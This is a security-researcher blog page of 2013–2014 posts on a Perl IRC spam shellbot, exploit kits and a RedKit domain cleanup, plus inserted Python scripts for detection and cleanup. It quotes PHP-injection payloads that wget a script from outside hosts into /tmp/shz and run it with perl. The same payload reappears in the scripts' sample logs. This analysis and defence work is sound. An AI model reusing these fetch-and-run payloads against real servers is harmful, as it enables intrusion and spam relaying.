“Perl IRC Shellbot” malware for servers

2014.05.02

Hi 🙂

Recently you may have seen strange input in your server logs…

Something like:

<?php system("wget http://xxxxx.altervista.org/lol.c -O /tmp/shz;perl /tmp/shz"); ?>

or

<?php system("wget http://86.125.12.167/lol.c -O /tmp/shz;perl /tmp/shz"); ?>

or

<?php system("wget http://94.23.42.103/lol.c -O /tmp/shz;perl /tmp/shz"); ?>


What does that mean? First of all, your server is at least potentially vulnerable to PHP code injection: the request is trying to get some script on your site to execute attacker-supplied PHP. Finding the request in the log means the attempt was made; whether it succeeded depends on whether the vulnerable code is actually there. Check it, and update, patch or fix it.

Second, check for processes running from the /tmp/ folder under the default Apache user (www-data, apache or similar). Note that the payload runs `perl /tmp/shz`, so the process shows up as perl with /tmp/shz as its argument, not as a binary in /tmp; also look for the dropped file /tmp/shz itself. If you find any of that, you have been infected. Take care of it.
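The two checks above, as an added example (this is not the author's code and not part of the bot): one function hunts the dropper payload in access log lines, in both the raw form quoted above and the percent-encoded form it usually has in a log, and another flags processes owned by the web-server account that execute from a temp directory. The log lines, the ps output and the set of web-server account names are constructed assumptions, as is the exact regex, which is built from the payload shape shown in the post.

```python
"""Spot the dropper in access logs and the dropped bot in the process list.

This is an added example for this post, not the author's code. The log lines
and ps output below are constructed samples; the regex assumes the payload
shape quoted in the post: system("wget <url> -O <path>;perl <path>").
"""
import re
from urllib.parse import unquote

# wget <url> -O <drop path> ; <interpreter> <same drop path>
DROPPER_RE = re.compile(
    r'system\s*\(\s*[\"\'“”]?\s*wget\s+(?P<url>\S+)\s+-O\s+(?P<path>\S+?)\s*;'
    r'\s*(?P<interp>perl|python|bash|sh)\s+(?P=path)',
    re.IGNORECASE,
)

def normalize(line, max_rounds=3):
    """Undo percent-encoding (possibly stacked) and the \\" / \\x22 escaping
    Apache applies to quotes in the request line, so one regex works on both
    the raw and the encoded form of the injection."""
    for _ in range(max_rounds):
        decoded = unquote(line)
        if decoded == line:
            break
        line = decoded
    return line.replace('\\"', '"').replace('\\x22', '"')

def find_droppers(lines):
    """Return one record per log line carrying the dropper payload."""
    hits = []
    for line in lines:
        m = DROPPER_RE.search(normalize(line))
        if m:
            hits.append({"url": m.group("url"), "path": m.group("path"),
                         "interpreter": m.group("interp").lower(), "line": line})
    return hits

TMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
WEB_USERS = {"www-data", "apache", "httpd", "nobody"}   # assumed web-server accounts

def parse_ps(text):
    """Parse `ps -eo pid,user,args --no-headers` output into records."""
    procs = []
    for line in text.strip().splitlines():
        parts = line.split(None, 2)
        if len(parts) == 3:
            procs.append({"pid": int(parts[0]), "user": parts[1], "args": parts[2]})
    return procs

def suspicious_processes(procs):
    """Processes owned by the web-server account whose binary, or whose first
    argument (the script an interpreter was given, e.g. `perl /tmp/shz`),
    lives in a world-writable temp directory."""
    hits = []
    for p in procs:
        argv = p["args"].split()
        if p["user"] in WEB_USERS and any(a.startswith(TMP_DIRS) for a in argv[:2]):
            hits.append(p)
    return hits

# Constructed samples (not real log data).
SAMPLE_LOG = r"""
10.0.0.5 - - [02/May/2014:10:12:01 +0000] "GET /index.php?page=<?php system(\"wget http://86.125.12.167/lol.c -O /tmp/shz;perl /tmp/shz\"); ?> HTTP/1.1" 404 210 "-" "Mozilla/5.0"
10.0.0.6 - - [02/May/2014:10:13:44 +0000] "GET /?q=%3C%3Fphp%20system(%22wget%20http%3A%2F%2F94.23.42.103%2Flol.c%20-O%20%2Ftmp%2Fshz%3Bperl%20%2Ftmp%2Fshz%22)%3B%20%3F%3E HTTP/1.1" 200 5120 "-" "-"
10.0.0.7 - - [02/May/2014:10:14:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 3032 "-" "Mozilla/5.0"
"""

SAMPLE_PS = """\
    1 root     /sbin/init
 2217 www-data /usr/sbin/apache2 -k start
 2290 www-data perl /tmp/shz
 2301 www-data /tmp/.x/run
 2310 mysql    /usr/sbin/mysqld
"""

if __name__ == "__main__":
    for h in find_droppers(SAMPLE_LOG.strip().splitlines()):
        print("dropper:", h["url"], "->", h["path"], "via", h["interpreter"])
    for p in suspicious_processes(parse_ps(SAMPLE_PS)):
        print("suspicious process:", p["pid"], p["user"], p["args"])
```

On a real box, feed `find_droppers` the lines of your access log and `parse_ps` the output of `ps -eo pid,user,args --no-headers`; the 404 on the first sample line is a reminder that a logged request is only evidence of an attempt, so the process check (and the presence of /tmp/shz) is what tells you whether it worked.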

Now, what does this thing actually look like?

Header:

[image: header of the script]

VT sample, in case you are curious: SHA256 137bf0491f90742a6428a926ab30e29af0d9932389226bae3539c4482e123269

It is an IRC-controlled bot whose main capability is sending spam. The language in the code looks like Brazilian Portuguese, apparently.

It has been seen in the wild since 2012 at least, according to Google 🙂, but older versions had less functionality. And now it is back 🙂

This is how it behaves:

1. The script connects to an IRC server, protected with credentials [unfortunately, the server is not available now].

2. It fetches lists of recipient e-mails, sender names and reply-to addresses from embedded URLs, composes the mail messages and sends them on behalf of the Apache user, so the spam leaves from your server and your IP.

Other bot capabilities include:

  • Proxy server
  • SOCKS server
  • Backdoor: command retrieval and execution

And, since fun is everything in malware hunting:

One of the functions:

[image: function source]

🙂 he/she is so excited 🙂

This is not a new player on the field, but he/she is recently back in business, so please be aware.

Well, review your logs and/or update me if you have any additional info.

Stay safe

D.L.


Malware hunt – wildfowl to find

2014.01.31

More than twice in the last 24 hours I was asked a non-trivial question:

Where do you find targets for malware hunting if you are not part of a big team, not a malware researcher, and do not own a honeynet?

Actually, if you do want to fight malware, IMHO it is very useful to have a honeypot system or, at least, to be in the security business somehow. That provides a non-stop flow of malicious targets to review. But what if you are not, and you still want to help?

Disclaimer: all links provided lead to lists of malicious or potentially malicious resources. Do not click any link there or run any file without the proper knowledge, a prepared (isolated) environment and trained skills.

Well, here are a few links that aggregate the latest known threats, which you can practice on:

Read more…

Ferret DDoS botnet v2.2 – inside the C&C panel

2013.12.23

Hi all

Today's story is about the Ferret DDoS bot. 🙂

[image: Ferret logo]

For those who missed it, I started hunting Ferret about a month ago:

http://twitter.com/it4sec/status/407021953611210752

And about a week ago Arbor Networks published research with quite a nice analysis. Read it HERE.

Is that the end? 🙁 Nope.

Read more…

“PowerLoader v2.0 and sons” – communication protocol details

2013.05.29

First of all, for those who do not know what a Power Loader is:

[image: Power Loader from 'Aliens']

From the 'Aliens' movie. I always wanted one to clean up the mess in my room as a teenager.

But we will talk about another PowerLoader: v2.0

[image: PowerLoader v2.0]

Read more…

“NY TRAFFIC TICKET” SPAM is back

2013.03.27

Well, it was gone for a while, and here it is back 🙂

Email message sample:

[image: email message sample]

The actual code looks like:

[image: email source]

The attack has actually been running for at least 48 hours already. You can see traces of it on URLQuery [36 entries by now].

When clicked, the link leads to BHEK2 (Blackhole Exploit Kit v2).

[image: BHEK2 landing]

BHEK2 payload: Cridex [22/46 on VT] and Fareit.

The second binary is an interesting one, yes 🙂 Wait for updates.

Stay safe!

D.L.


Cool Exploit Kit – “We Try harder!”

2013.03.13

Heh, when I am sick, it's time to hunt…

Prerequisites: 

Temperature: 37.8 C

Local Time: 23:00

Mood: [censored]

Test machine: fully updated (PDF reader, Flash, Java up to 7u17)

Live Exploit Kits in list: 5

What we are testing:

How dangerous surfing can be for those who follow best practices, at least keeping their software updated.

Results:

The behavior of all tested exploit kits can be described as:

– If a plugin-detect script is present, the kit realizes that no vulnerable plugins were detected, and then either

– no exploit is served at all [Safe End], or

– the latest available Java exploit is served anyway [Fail].

– If no plugin-detect is present, all available exploits are executed, and all of them fail.

* Sometimes the LibTIFF exploit crashed the PDF plugin, and once Java caused an error message to appear…

Bottom line: if the machine is up to date, well, the kits leave it alone; there are plenty of easy targets around. 

Except for Cool Exploit Kit. Let me show you some fun stuff there… 

Read more…

Security is everyone’s concern, or why blacklisting fails.

2013.03.12

“Democracy is the worst form of government, except for all those other forms that have been tried from time to time.” (Winston Churchill)

I wrote a huge philosophical part here… But then I realized that too much ideology has already been dumped onto the Net, no need to add more.

So, take Mr. Churchill's quote and put "blacklisting" in place of "democracy" << this is exactly my point.

And to make a long story short: as protection against malware, blacklisting fails.

Why? Simple.

Blacklisting: “…a blacklist or block list is a basic access control mechanism that allows through all elements (email addresses, users, URLs, etc.), except those explicitly mentioned. Those items on the list are denied access…” (Wikipedia)

So, basically, how it is supposed to work:

1. Someone detects that IP x.x.x.x or domain badassmalwarehomepage.com is spreading malware, has an exploit kit installed, or shows some other malicious activity.

2. The IP or domain is added to a blacklist; now all software that uses that blacklist is protected from visiting the bad site.

3. The Internet is safe! (Yeah…)

And how it actually works:

1. A malicious IP or domain is detected. It takes some time to detect a new attack, discover all the infectors, gather all the evidence and prepare a report.

2. The IP/domain is reported. There are plenty of different lists, each with its own rules. It takes some time to re-check the report and add the entry to the list; otherwise the reporting process itself could be abused. 

3. Clients are not up to date, lists are delivered only from time to time, and checking against a list takes time and traffic. Bottom line: at the fastest, it takes 2-3 days to get things done. By then the attacker has already made a profit, monetized it and is planning the next attack. 

Nothing new for many of you, and as I said, it is a terrible solution, but we do not have another one right now.

But wait, it gets even worse 🙂

Malware does not need to have its own IP/domain exposed to victims, or even to malware researchers, at any level. Let me show you how. 

Read more…


CrimeBoss Exploit Kit – Java CVE-2013-0422 + SE tricks :)

2013.03.06

CrimeBoss EK is already known and described; you can see it here:

KahuSecurity

MalwareSigs

So I will not paste all the details step by step. Whoever is interested can see them there.

What was interesting in this particular case was the Java exploit, which tries to convince the victim that it is Adobe Flash Player. 🙂

[image: fake Adobe Flash Player prompt]

Not new, actually, you are right. @kafeine recently posted details about similar behavior of a recent Java exploit in the Popads EK.

So, as you can see, the idea seems to be spreading among other malware distributors as well. 🙂

Actually, if you press "Cancel" at this point, no harm is done to your machine (if Java is up to date): the "Flash Player" branding is there only to make you click through the Java prompt.

If Java is outdated, 2 additional exploits are served as well.

Here are the samples on VT:

Java:

JAR1 JAR2 JAR3

Exe:

Bin [6/46]

That’s all

Stay safe

D.L.


List of compromised domains [2725] that spread RedKit EK.

2013.02.03

Hi all, folks.

I need your help.

For the last few months we have been watching the former RedKit spread all over, using compromised websites to get onto victim machines.

At this point, combined tracker results indicate that at least 2725 unique domains were compromised and participated in RedKit spreading from 11.11.2012 to 31.01.2013.

Since I literally have no free time to manage the whole cleanup process and no resources to support the owners of those web resources (most of them do not even respond to mail), here is the list 

Please note that this list is not 100% solid: there were a few changes in the exploit kit's spreading system for which the tracking agent needed to be reconfigured, but the bottom line is that it is at least 90% accurate.

Some domains were cleaned up, some were reported for abuse and taken down by the hosting company or the owner. Most of the listed hosts are still infected, I assume. And since the MDS reuses them frequently, at some point they will appear as malicious again. Please act accordingly.

In case your website is listed here:

Removal instructions [for site, host and shared hosting service owners]:

1. Search for .htaccess files, and php.ini or .user.ini files, in the document root directories (and their subdirectories; these are dotfiles, so use ls -a or find), and check them for mod_rewrite.c entries (see more details here).

2. Clean up the files referenced in the mod_rewrite.c section of the .htaccess (the rewrite targets), and remove the injected section itself.

3. Hire a security professional to harden your website/service to prevent future intrusions. If you do not, the malware will return. 
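The search in steps 1 and 2, as an added example (not the author's tool and not part of RedKit): it walks a document root, lists every mod_rewrite.c block in each .htaccess together with the files and URLs its rules point at, and flags the blocks that look injected. What counts as "looks injected" is an assumption here rather than something the post describes: a rule that sends visitors to another host, or a rewrite conditional on the Referer/User-Agent header. For php.ini and .user.ini it flags auto_prepend_file/auto_append_file, since those include a file into every PHP request. The sample .htaccess, the .user.ini content and the host names in them are constructed.

```python
"""Triage .htaccess, .user.ini and php.ini files during a RedKit cleanup.

Added example for the removal steps in this post; not the author's tool.
What it flags is an assumption about how injected hooks usually look, not a
description taken from the post. The samples at the bottom are constructed.
"""
import os
import re
from urllib.parse import urlparse

IFMODULE_RE = re.compile(r'<IfModule\s+mod_rewrite\.c\s*>(?P<body>.*?)</IfModule>',
                         re.IGNORECASE | re.DOTALL)
RULE_RE = re.compile(r'^\s*RewriteRule\s+(\S+)\s+(\S+)', re.IGNORECASE | re.MULTILINE)
COND_RE = re.compile(r'^\s*RewriteCond\s+%\{(HTTP_REFERER|HTTP_USER_AGENT)\}',
                     re.IGNORECASE | re.MULTILINE)
INI_HOOK_RE = re.compile(r'^\s*(auto_prepend_file|auto_append_file)\s*=\s*(.+?)\s*$',
                         re.IGNORECASE | re.MULTILINE)

def scan_htaccess(text, own_hosts=()):
    """One record per mod_rewrite.c block: the rewrite targets (the files to
    clean in step 2) plus reasons the block looks suspicious; an empty 'why'
    means nothing odd was seen."""
    records = []
    for block in IFMODULE_RE.finditer(text):
        body = block.group("body")
        targets, why = [], []
        for m in RULE_RE.finditer(body):
            target = m.group(2)
            if target == "-":            # "-" means "no substitution"
                continue
            targets.append(target)
            host = urlparse(target).hostname
            if host and host not in own_hosts:
                why.append("redirects to external host " + host)
        if COND_RE.search(body):
            why.append("rewrite depends on Referer/User-Agent")
        records.append({"targets": targets, "why": why})
    return records

def scan_ini(text):
    """Directives that silently include a file in every PHP request."""
    return [{"directive": d.lower(), "value": v.strip('"\'')}
            for d, v in INI_HOOK_RE.findall(text)]

def scan_tree(root, own_hosts=()):
    """Walk a docroot; os.walk lists dotfiles, so nested .htaccess are seen."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if name == ".htaccess":
                with open(path, errors="replace") as f:
                    found = [r for r in scan_htaccess(f.read(), own_hosts) if r["why"]]
            elif name in (".user.ini", "php.ini"):
                with open(path, errors="replace") as f:
                    found = scan_ini(f.read())
            else:
                continue
            if found:
                results[path] = found
    return results

# Constructed samples: a normal WordPress block followed by an injected one.
SAMPLE_HTACCESS = r"""
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule . /index.php [L]
</IfModule>
# END WordPress

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} (google|yahoo|bing)\. [NC]
RewriteRule .* http://bad-redirect.example/in.cgi?5 [R,L]
</IfModule>
"""

SAMPLE_USER_INI = """\
upload_max_filesize = 8M
auto_prepend_file = "/tmp/.cache/x.php"
"""

if __name__ == "__main__":
    for r in scan_htaccess(SAMPLE_HTACCESS, own_hosts=("www.example.com",)):
        print(r)
    print(scan_ini(SAMPLE_USER_INI))
```

Run `scan_tree("/var/www/html", own_hosts=("www.yoursite.tld",))` on the real docroot; every path it returns is a file to read by hand, and every target it lists under a flagged block is a file to inspect and remove before the hook itself is deleted.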

Stay Safe!

D.L.


Inside “4 horses club” malware >> social details :)

2013.02.01

It is too big for Twitter, so I am posting it as a separate blog post.

Some time ago I posted info about the ransomware from the “4 horses club”. Grab it HERE.

Here is the login page of this affiliate program for partners (click for a bigger picture)

[image: affiliate program login page]

Read more…